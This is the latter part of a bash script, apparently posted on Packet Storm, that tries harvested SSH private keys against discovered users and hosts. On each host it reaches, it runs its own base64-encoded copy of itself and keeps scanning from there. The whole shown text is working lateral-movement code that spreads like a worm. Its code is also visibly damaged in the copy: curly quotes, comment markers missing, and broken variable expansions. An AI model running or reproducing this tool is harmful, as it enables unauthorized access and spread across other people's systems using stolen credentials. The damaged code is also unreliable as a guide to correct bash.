[[ -v 'resolved_hosts["$ssh_host"]' || ${#resolved_hosts["$ssh_host"]} -gt 0 ]] && continue

 resolved_hosts["$ssh_host"]=1  
(getent ahostsv4 -- "$ssh_host" > /dev/null 2>&1 &)  

done

wait

resolved_hosts=()

for ssh_dest in "${!ssh_dests[@]}"; do
local ssh_user
local ssh_host
local resolved_ssh_host

# Make everything lower case.  
ssh_dest="${ssh_dest,,}"

is_ssh_dest "$ssh_dest" || continue

ssh_user="${ssh_dest%%@*}"  
ssh_host="${ssh_dest#*@}"

# Check if the host has already been resolved. If it has, use the internally cached answer.  
if [[ -v 'resolved_hosts["$ssh_host"]' || ${#resolved_hosts["$ssh_host"]} -gt 0 ]]; then  
  resolved_ssh_host="${resolved_hosts["$ssh_host"]}"  
else  
  # If the host has not already been resolved, resolve it using getent.  
  resolved_ssh_host="$(getent ahostsv4 -- "$ssh_host" 2>/dev/null)"  
  resolved_ssh_host="${resolved_ssh_host%% *}"

  # Answer must begin with 1 or 2 (getent ahosts v4 0.1.2.3 will respond with 0.1.2.3).  
  if [[ "${resolved_ssh_host:0:1}" =~ [12] ]]; then  
    [[ "$resolved_ssh_host" =~ ^127\. ]] && resolved_ssh_host="127.0.0.1" # If it's loopback, always use 127.0.0.1  
    # Cache the host  
    resolved_hosts["$ssh_host"]="$resolved_ssh_host"  
  else  
    # Ignore this host  
    _ignored_hosts["$ssh_host"]=1  
    # Also ignore the resolved host (which may not necessarily be the same as the host).  
    [[ -n "$resolved_ssh_host" ]] && _ignored_hosts["$resolved_ssh_host"]=1  
    continue  
  fi  
fi

# Check whether the resolved host is ignored. If so, also add the unresolved host to _ignored_hosts.  
[[ -v '_ignored_hosts["$resolved_ssh_host"]' || ${#_ignored_hosts["$resolved_ssh_host"]} -gt 0 ]] && _ignored_hosts["$ssh_host"]=1  
# add_ssh_dest will check whether the $ssh_user@$resolved_ssh_host is ignored.

valid_ssh_dests["$ssh_user@$resolved_ssh_host"]=1  

done

ssh_dests=()

for ssh_dest in "${!valid_ssh_dests[@]}"; do
add_ssh_dest “$ssh_dest”
done
}

Check whether a file is a real file, exists, contains something, and is readable.

is_file() {
local filename

filename="$1"

[[ -v 'files[“$filename”]' || ${#files[“$filename”]} -gt 0 ]] && return 0
[[ -v 'not_files[“$filename”]' || ${#not_files[“$filename”]} -gt 0 ]] && return 1

${s} test -s “$filename” && ${s} test -r “$filename” && ${s} test -f “$filename” && files[“$filename”]=1 && return 0

not_files[“$filename”]=1
return 1
}

Checks whether a folder is a real folder, and is readable.

is_dir() {
local dir_name

dir_name="$1"

[[ -v 'folders[“$dir_name”]' || ${#folders[“$dir_name”]} -gt 0 ]] && return 0
[[ -v 'not_folders[“$dir_name”]' || ${#not_folders[“$dir_name”]} -gt 0 ]] && return 1

${s} test -d “$dir_name” && ${s} test -r “$dir_name” && folders[“$dir_name”]=1 && return 0

not_folders[“$dir_name”]=1
return 1
}

Checks whether a string is a candidate for an ssh user.

is_ssh_user() {
local ssh_user

ssh_user="$1"

[[ -z “$ssh_user” ]] && return 1

[[ -v '_ignored_users[“$ssh_user”]' || ${#_ignored_users[“$ssh_user”]} -gt 0 ]] && return 1

[[ -v 'ssh_users[“$ssh_user”]' || ${#ssh_users[“$ssh_user”]} -gt 0 ]] && return 0

[[ “$ssh_user” =~ ^$allowed_users_chars$ ]] || return 1

return 0
}

Checks whether a string is a candidate for an ssh host.

is_ssh_host() {
local ssh_host

ssh_host="$1"

[[ -z “$ssh_host” ]] && return 1

[[ -v '_ignored_hosts[“$ssh_host”]' || ${#_ignored_hosts[“$ssh_host”]} -gt 0 ]] && return 1

[[ -v 'ssh_hosts[“$ssh_host”]' || ${#ssh_hosts[“$ssh_host”]} -gt 0 ]] && return 0

[[ “$ssh_host” =~ ^$allowed_host_chars+$ ]] || return 1

[[ “${ssh_host:0:1}” == "-" || “${ssh_host:0-1}” == "-" || “${ssh_host:0:1}” == “.” || “${ssh_host:0-1}” == “.” || “$ssh_host” == "-." || “$ssh_host” == “–” ]] && return 1

return 0
}

Checks whether a string is a candidate for an ssh dest.

is_ssh_dest() {
local ssh_user
local ssh_host
local ssh_dest

ssh_dest="$1"

[[ -z “$ssh_dest” ]] && return 1

XXX: The below line is intrinsically flawed because even if $ssh_dest is already in ssh_dests, this does not mean $ssh_host has not been added to $_ignored_hosts. We keep it here to remember not to add it again.

[[ -v 'ssh_dests[“$ssh_dest”]' || ${#ssh_dests[“$ssh_dest”]} -gt 0 ]] && return 0

[[ -v '_ignored_dests[“$ssh_dest”]' || ${#_ignored_dests[“$ssh_dest”]} -gt 0 ]] && return 1

ssh_user="${ssh_dest%%@}"
ssh_host="${ssh_dest#
@}"

is_ssh_host “$ssh_host” && is_ssh_user “$ssh_user” && return 0

return 1
}

Add to ssh_users if it’s a user.

add_ssh_user() {
local ssh_user

ssh_user="$1"
is_ssh_user “$ssh_user” && ssh_users[“$ssh_user”]=1 && return 0

return 1
}

Add to ssh_hosts if it’s a host.

add_ssh_host() {
local ssh_host

ssh_host="$1"
is_ssh_host “$ssh_host” && ssh_hosts[“$ssh_host”]=1 && return 0

return 1
}

Add to ssh_dests if it’s a dest.

Note: This also adds to ssh_hosts and ssh_users.

add_ssh_dest() {
local ssh_dest
local ssh_host
local ssh_user

ssh_dest="$1"
ssh_user="${ssh_dest%%@}"
ssh_host="${ssh_dest#
@}"

is_ssh_dest “$ssh_dest” && ssh_dests[“$ssh_dest”]=1 && ssh_hosts[“$ssh_host”]=1 && ssh_users[“$ssh_user”]=1 && return 0

return 1
}

Print a line in recursive_scan beginning with the appropriate separator length and chain.

Since we’re calling this within recursive_scan, we need to add another indentation on top of $indent, since we’re emulating the next host.

Argument $1 is the chain to print.

Argument $2 is what to print after the chain. Normally, that would probably be the ssh_dest.

rs_chained_print() {
printf “%s%*s%s->%s\n” “$indent” 1 “” “$1” “$2”
}

Call rs_chained_print twice, with separate chains.

$1 is chain 1, $2 is chain 2, and $3 is what to print.

double_rs_chained_print() {
rs_chained_print “$1” “$3”
rs_chained_print “$2” "($3)"
}

The main SSH function of the script.

Loop through each destination, then loop through each private key file.

Attempt ssh on all of the valid destinations with each of the private key files.

recursive_scan() {
declare -A retry_dests
declare -A retry_keys
local ssh_dest
local priv_key
local key_file

Loop through each destination.

for ssh_dest in "${!ssh_dests[@]}"; do
local ssh_user
local ssh_host

ssh_user="${ssh_dest%%@*}"  
ssh_host="${ssh_dest#*@}"

# Check whether the host and user are valid (the host may have been added while inside this loop).  
is_ssh_user "$ssh_user" || continue  
is_ssh_host "$ssh_host" || continue

# Loop through each ssh key.  
for priv_key in "${!priv_keys[@]}"; do  
  local t_hosts_chain  
  local t_hostnames_chain  
  local skip_this_dest  
  local line  
  local line_num

  key_file="${priv_keys["$priv_key"]}"

  # Check whether the key is still valid (it may have been added to the ignore list while inside this loop).  
  [[ -v '_ignored_key_files["$key_file"]' || ${#_ignored_key_files["$key_file"]} -gt 0 ]] && continue

  # A $key_file is appended with ! if sudo is being used.  
  # Define the future hosts_chain  
  t_hosts_chain="${hosts_chain}[${s:+!}${key_file}]"  
  # Define the future hostnames_chain  
  t_hostnames_chain="${hostnames_chain}[${s:+!}${key_file}]"  
  # If set to 1, we will stop trying any new keys for this dest (aka we break).  
  skip_this_dest=0  
  # Record the amount of lines for each ssh attempt.  
  line_num=0

  # Loop through each line of the SSH output one-by-one.  
  while IFS= read -r line; do  
    ((line_num++))  
    # If there is a connection error a dest, don't bother trying other keys (or other users) for the other users of the same host.  
    #  
    # ssh: Could not resolve hostname server: Name or service not known ; should never happen since we use ip addresses, but pick it up anyways.  
    # ssh: connect to host ip port 22: Connection refused  
    # ssh: connect to host ip port 22: Connection timed out  
    # ssh: connect to ip port 22: No route to ip  
    # ssh: connect to host ip port 22: Network is unreachable  
    # ssh: connect to host port 22: No route to host  
    # ssh: connect to host ip port 22: Operation timed out  
    if [[ "$line" == *"resolve hostname"* || "$line" == *"connect to "* ]]; then  
      _ignored_hosts["$ssh_host"]=1  
      skip_this_dest=1  
      break  
    fi

    # bash argument list too long; we can't continue, so print where we are, the maximum argument length (because why not), and the ignore_list (which is the non-static part of the script which is causing the argument list too long).  
    # It may be useful to take the ignore_list and set those ip destinations as ignored_dests.  
    if [[ "$line" == *"Argument list too long"* ]]; then  
      double_rs_chained_print "$t_hosts_chain" "$t_hostnames_chain" "$ssh_dest"  
      rs_chained_print "$t_hosts_chain" "$ssh_dest [ARG_LIMIT:$(getconf -a | awk '/ARG_MAX/{print $NF; exit}'), $(printf "%s" "$ignore_list" | base64 | tr -d '\n')]"  
      printf "INTERNAL_MSG: ARG_LIMIT\n"  
      fin  
    fi

    # This is an unrecoverable error, so kill everything.  
    if [[ "$line" == "INTERNAL_MSG: ARG_LIMIT" ]]; then  
      printf "INTERNAL_MSG: ARG_LIMIT\n"  
      fin  
    fi

    # Various warnings may occur when using ssh, bash, or other programs. In general, we can simply ignore these messages as they're warnings, not errors, and we have no use for them at all.  
    #  
    # Warning: Permanently added '...' (RSA) to the list of known hosts.  
    # Permission denied (publickey,password).  
    # grep: [file]: Permission denied  
    # identity_sign: private key [file] contents do not match public  
    # load pubkey [file]: invalid format  
    # sudo: unable to resolve host  
    # warning: setlocale: LC_ALL: cannot change locale (en_US.UTF-8)  
    # key_load_public: invalid format  
    if [[ "$line" == *"Warning: Permanently added"* || "$line" == *"Permission denied"* || "$line" == *"contents do not match public"* || "$line" == *"load pubkey"* || "$line" == *"unable to resolve host"* || "$line" == *"warning: setlocale"* || "$line" == *"key_load_public: invalid format"* ]]; then  
      continue  
    fi

    # The HostkeyAlgorithms may not be supported. XXX: should we be reporting this? Can we somehow bypass it? Maybe we can try adding to ssh_options?  
    #  
    # Unable to negotiate with 192.168.1.1 port 22: no matching host key type found. Their offer: ssh-dss  
    if [[ "$line" == *"Unable to negotiate with"* ]]; then  
      continue  
    fi

    # Various errors may occur due to an ssh key not being valid. Ignore those keys in the future.  
    #  
    # Warning: Identity file [file] not accessible: No such file or directory.  
    # Warning: Identity file [file] not accessible: Permission denied.  
    # Load key [file]: invalid format  
    # Load key [file]: bad permissions  
    if [[ "$line" == "Warning: Identity file"* || "$line" == "Load key"* ]]; then  
      _ignored_key_files["$key_file"]=1  
      break  
    fi

    # A destination has finished scanning and we add it to the ignore list. We also propagate it.  
    # When a destination is finished scanning, it gets added to the ignore_list in all intermediate destinations.  
    # However, remember, that for: A->B->C, the ignore_list on destination "B" will initially be longer than the ignore_list of "A". This is because while we add ourself(server) to the ignore_list when starting, we don't propagate it until we have finished.  
    if [[ "$line" == "INTERNAL_MSG: ignore list: "* ]]; then  
      local ignore_new

      ignore_new="${line#*INTERNAL_MSG: ignore list: }"  
      if [[ "$ignore_list" != *"$ignore_new"* ]]; then  
        ignore_list+="$ignore_new"  
      fi  
      printf "%s\n" "$line"  
      continue # Don't break, as it may be being passed through from a much higher destination.  
    fi

    # If a destination has been scanned but fails a check to ensure all the programs that this script needs are present, report that the destination can be SSH'd to, and the function that is missing.  
    if [[ "$line" == "INTERNAL_MSG: command not found: "* ]]; then  
      local missing_cmd

      double_rs_chained_print "$t_hosts_chain" "$t_hostnames_chain" "$ssh_dest"

      missing_cmd="${line#*INTERNAL_MSG: command not found: }"  
      rs_chained_print "$t_hosts_chain" "$ssh_dest [fail,cmd,$missing_cmd]"  
      break  
    fi

    # sh: bash: inaccessible or not found  
    # sh: bash: not found  
    # Bash is not available on the system.  
    if [[ "$line" == *"sh: bash"* ]]; then  
      double_rs_chained_print "$t_hosts_chain" "$t_hostnames_chain" "$ssh_dest"  
      rs_chained_print "$t_hosts_chain" "$ssh_dest [fail,cmd,bash]"  
      break  
    fi

    # If a destination has no memory, it is likely to crash while running this script using awk, or some other program. Catch it and report that it is out of memory.  
    if [[ "$line" == *"Segmentation fault"* || "$line" == *"cannot allocate"* || "$line" == *"core dumped"* ]]; then  
      double_rs_chained_print "$t_hosts_chain" "$t_hostnames_chain" "$ssh_dest"  
      rs_chained_print "$t_hosts_chain" "$ssh_dest [OoM]"  
      break  
    fi

    # Shell is /usr/sbin/nologin  
    if [[ "$line" == *"This account is currently not available"* ]]; then  
      double_rs_chained_print "$t_hosts_chain" "$t_hostnames_chain" "$ssh_dest"  
      rs_chained_print "$t_hosts_chain" "$ssh_dest [NoLogin]"  
      break  
    fi

    # Gitlab instances may be accessed, and it's quite easy to detect it. Since git uses ssh, we can record this.  
    #  
    # Disallowed command  
    if [[ "$line" == "Disallowed command" ]]; then #Gitlab  
      double_rs_chained_print "$t_hosts_chain" "$t_hostnames_chain" "$ssh_dest"  
      rs_chained_print "$t_hosts_chain" "$ssh_dest [GitLab]"  
      break  
    fi

    # Github, too.  
    #  
    # Invalid command: cmd  
    if [[ "$line" == "Invalid command:"* ]]; then #Github  
      double_rs_chained_print "$t_hosts_chain" "$t_hostnames_chain" "$ssh_dest"  
      rs_chained_print "$t_hosts_chain" "$ssh_dest [GitHub]"  
      break  
    fi

    # SSH may sporadically fail due to connection issues in various ways. Looking at the source for openssh and using all of the servers that reported errors, I've determined that the following errors may occur when a connection to a server is broken one way or another.  
    # When any of these errors occur naturally, we retry the destination (and the key which is associated with this destination).  
    #  
    # Write failed: Broken pipe  
    # Timeout, server [host] not responding  
    # Connection to host closed by remote host  
    # Read from remote host [host]: [error]  
    # Connection closed by [host] XXX: This may mean it's vulnerable to https://joshua.hu/ssh-username-enumeration-ubuntu-18  
    # Connection closed by [host] port 22 XXX: This may mean it's vulnerable to https://joshua.hu/ssh-username-enumeration-ubuntu-18  
    # ssh_exchange_identification: read: Connection reset by peer  
    # Connection from/to ip [host] timed out  
    # Disconnected from [host]  
    # Connection reset by [host]/peer, kex_exchange_identification: read: Connection reset by peer  
    # Connection to [host] closed by remote host. XXX: This may mean it's vulnerable to https://joshua.hu/ssh-username-enumeration-ubuntu-18  
    # Connection to [host] timed out while waiting to read  
    # kex_exchange_identification: Connection closed by remote host  
    # ssh_exchange_identification: Connection closed by remote host  
    # Connection timed out during banner exchange  
    # Connection to [host] port [port] timed out  
    # Bad remote protocol version identification  
    # Protocol major versions differ  
    if [[ "$line" == *"Broken pipe"* || "$line" == *"Timeout, server"* || "$line" == "Connection to"* || "$line" == "Read from remote host"* || "$line" == *"Connection closed by"* || "$line" == *" timed out"* || "$line" == *"Disconnected from"* || "$line" == *"Connection reset by"* || "$line" == *"closed by remote host"* || "$line" == *"kex_exchange_identification"* || "$line" == *"ssh_exchange_identification"* || "$line" == *"Bad remote protocol version identification"* || "$line" == *"Protocol major versions differ"* ]]; then  
      if [[ "$line_num" -le 3 ]]; then  
        # If we receive one of these errors within the first three lines of the connection being made, it most likely means there is something fatally wrong with the server.  
        # This could be a server vulnerable to https://joshua.hu/ssh-username-enumeration-ubuntu-18, or some other error where the connection was never established in the first place, and is never going to be.  
        # If the error message is not that of a possibly vulnerable server, then add the host to _ignored_hosts.  
        if [[ "$line" != "Connection closed by"* && "$line" != "Connection to"* && "$line" != *"closed by remote host." ]]; then  
          _ignored_hosts["$ssh_host"]=1  
        fi  
        # Either way, skip this destination because it's never going to work.  
        skip_this_dest=1  
        break  
      fi  
      # Otherwise, we retry the destination.  
      retry_keys["$priv_key"]="$key_file"  
      retry_dests["$ssh_dest"]=1  
      rs_chained_print "$t_hosts_chain" "$ssh_dest [ConnErr]"  
      break  
    fi

    # Some AWS servers (EC2?) restrict ssh to certain users. We can grab the correct user and attempt to SSH in it when we perform our retries.  
    #  
    # Please login as the user "ubuntu" rather than the user "root".  
    if [[ "$line" == "Please login as the user"* ]]; then # AWS  
      local aws_ssh_user

      double_rs_chained_print "$t_hosts_chain" "$t_hostnames_chain" "$ssh_dest"

      aws_ssh_user="${line#*\"}"  
      aws_ssh_user="${aws_ssh_user%%\"*}"  
      if is_ssh_dest "$aws_ssh_user@$ssh_host"; then  
        rs_chained_print "$t_hosts_chain" "$ssh_dest [fail,aws,$aws_ssh_user]"  
        if [[ ! -v 'ssh_dests["$aws_ssh_user@$ssh_host"]' || ${#ssh_dests["$aws_ssh_user@$ssh_host"]} -eq 0 ]]; then  
          retry_dests["$aws_ssh_user@$ssh_host"]=1  
          retry_keys["$priv_key"]="$key_file"  
        fi  
      else  
        rs_chained_print "$t_hosts_chain" "$ssh_dest [fail,aws,$line]"  
      fi  
      break  
    fi

    # Eventually, we have no special cases left.  
    # If the line contains the chain, then it means the line has also been "dealt with" (i.e. it is an expected output) from the remote destination. For example: [00000]     user@host[key]->user@host2[key2]->user@host3: something.  
    # Since it contains "user@host[key]->user@host2[key2]->user@host3", that means the remote destination printed it from the script.  
    # So, just pass it down to other destinations down the chain.  
    if [[ "$line" == *"$t_hosts_chain"* || "$line" == *"$t_hostnames_chain"* ]]; then # Includes a chain, so just print it.  
      printf "%s\n" "$line"  
    else  
      # If the line doesn't contain the chain, then it's an unexpected output. So, print the chain including the destination, and the line.  
      rs_chained_print "$t_hosts_chain" "$ssh_dest [line]: $line" # Doesn't include a chain, so the message is coming from something we didn't expect, so print it with [line].  
    fi  
  done < <(stdbuf -o0 ${s} ssh "${ssh_options[@]}" -i "$key_file" -- "$ssh_dest" "echo 'printf \"%s\" \$1 | base64 -d | stdbuf -o0 bash --noprofile --norc -s \$1 \$2 \$3 \$4 \$5' | stdbuf -o0 bash --noprofile --norc -s -- '$script' '$(printf "%s" "$t_hosts_chain" | base64 | tr -d '\n')' '$ignore_list' '$ssh_dest' '$(printf "%s" "$t_hostnames_chain" | base64 | tr -d '\n')'" </dev/null 2>&1 | tr -d '\r')  
  [[ $skip_this_dest -eq 1 ]] && break

done  

done

if [[ $use_find_from_ignore_list -eq 2 ]]; then
local ssh_dest

# Re-load the new ignore_list into the ignore_list_array array.  
load_ignore_list_array

for ssh_dest in "${!ignore_list_array[@]}"; do  
  [[ -z "$ssh_dest" ]] && continue  
  [[ -v 'ssh_dests["$ssh_dest"]' || ${#ssh_dests["$ssh_dest"]} -gt 0 ]] && continue # Don't bother scanning if it's already been scanned  
  retry_dests["$ssh_dest"]=1  
done  
for priv_key in "${!priv_keys[@]}"; do  
  key_file="${priv_keys["$priv_key"]}"  
  retry_keys["$priv_key"]="$key_file"  
done  

fi

Do we have some dests to retry? (AWS or connection errors)

(( ${#retry_dests[@]} )) || return
(( ${#retry_keys[@]} )) || return

Have we already tried too many times?

[[ $retry_count -gt 0 ]] || return

((retry_count–))

ssh_dests=()
priv_keys=()

for ssh_dest in "${!retry_dests[@]}"; do
# add_ssh_dest is null-op’d here, so add it manually.
is_ssh_dest “$ssh_dest” && ssh_dests[“$ssh_dest”]=1
done

for priv_key in “${!retry_keys[@]}"; do
[[ -v '_ignored_key_files[“$priv_key”]' || ${#_ignored_key_files[“$priv_key”]} -gt 0 ]] && continue
priv_keys[“$priv_key”]="${retry_keys[“$priv_key”]}”
done

(( ${#ssh_dests[@]} )) || return
(( ${#priv_keys[@]} )) || return

priv_keys maybe empty, add_ssh_dest could be newly ignored.

printf “%s%s: EXTERNAL_MSG: INFO: Trying again with %d dests and %s keys (attempts left: %d)\n” “$indent” “$hosts_chain” “${#ssh_dests[@]}” “${#priv_keys[@]}” “$retry_count”
recursive_scan
}

setup

exec_custom_cmds

find_all

combinate_users_hosts_aggressive
combinate_interesting_users_hosts

deduplicate_resolved_hosts_keys

(( ${#ssh_dests[@]} )) || fin
(( ${#priv_keys[@]} )) || fin

printf “%s%s: EXTERNAL_MSG: INFO: Beginning with %d dests and %d keys\n” “$indent” “$hosts_chain” “${#ssh_dests[@]}” “${#priv_keys[@]}”

recursive_scan

fin
MAIN_SCRIPT
)
printf “%s” “$THIS_SCRIPT” | stdbuf -o0 bash --noprofile --norc

Packet Storm: Latest News

Ubuntu Security Notice USN-7121-3